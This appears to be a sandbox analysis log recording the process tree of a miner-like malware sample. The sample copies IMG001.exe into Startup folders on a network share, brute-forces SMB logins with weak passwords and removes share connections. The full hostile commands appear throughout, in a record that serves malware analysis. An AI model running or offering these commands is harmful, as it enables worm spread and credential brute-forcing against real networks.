C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6332
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6732
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:7144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1852
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:6508 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:6008 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7024
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4512
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:5620 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7000
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:6920
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:6740 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2252
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
PID:3456
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5172
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4548
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:4820 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6096
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5428
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7140
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:768
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:5164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:772
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:7048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:6184
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3540
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:3752
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "6⤵PID:6552
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6912
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5960
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6132
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:4512
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:2060
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:6424
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6276
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"6⤵PID:2432
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"6⤵PID:6988
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3744
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:2448
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:4568
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:6860
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"1"6⤵PID:2780
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:5760
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5776
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"1"6⤵PID:4872
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:5612
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4884
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"10.127.0.1"6⤵PID:4932
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"10.127.0.1"6⤵PID:6716
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:3200
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"10.127.0.1"6⤵PID:200
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"10.127.0.1"6⤵PID:1644
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6972
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"10.127.0.1"6⤵PID:3396
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"10.127.0.1"6⤵PID:4088
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4892
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"6⤵PID:6736
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"6⤵PID:7020
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:848
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"10.127.0.1"6⤵PID:3452
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"10.127.0.1"6⤵PID:1964
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1276
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"10.127.0.1"6⤵PID:6528
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"10.127.0.1"6⤵PID:5344
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:4996
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"administrator"6⤵PID:5796
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"administrator"6⤵PID:5584
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:2508
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"administrator"6⤵
- System Location Discovery: System Language Discovery
PID:5500
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"administrator"6⤵PID:3308
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6152
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"administrator"6⤵PID:6436
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"administrator"6⤵PID:2104
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5744
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "administrator" /user:"administrator"6⤵PID:2572
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "administrator" /user:"administrator"6⤵PID:4864
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3140
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"administrator"6⤵PID:4040
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"administrator"6⤵PID:8
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:6244
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"administrator"6⤵PID:6924
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"administrator"6⤵PID:6928
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3672
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"user"6⤵PID:6768
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"user"6⤵
- System Location Discovery: System Language Discovery
PID:6368
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:6264
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"user"6⤵PID:6424
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"user"6⤵PID:844
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5524
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"user"6⤵PID:2432
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"user"6⤵PID:2932
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2040
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "user" /user:"user"6⤵PID:5300
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "user" /user:"user"6⤵PID:2916
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5904
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"user"6⤵PID:4960
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"user"6⤵PID:5008
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6712
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"user"6⤵PID:5696
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"user"6⤵PID:2452
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6696
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"admin"6⤵PID:1552
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"admin"6⤵PID:6652
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"admin"6⤵PID:1792
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"admin"6⤵
- System Location Discovery: System Language Discovery
PID:848
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1500
-
-
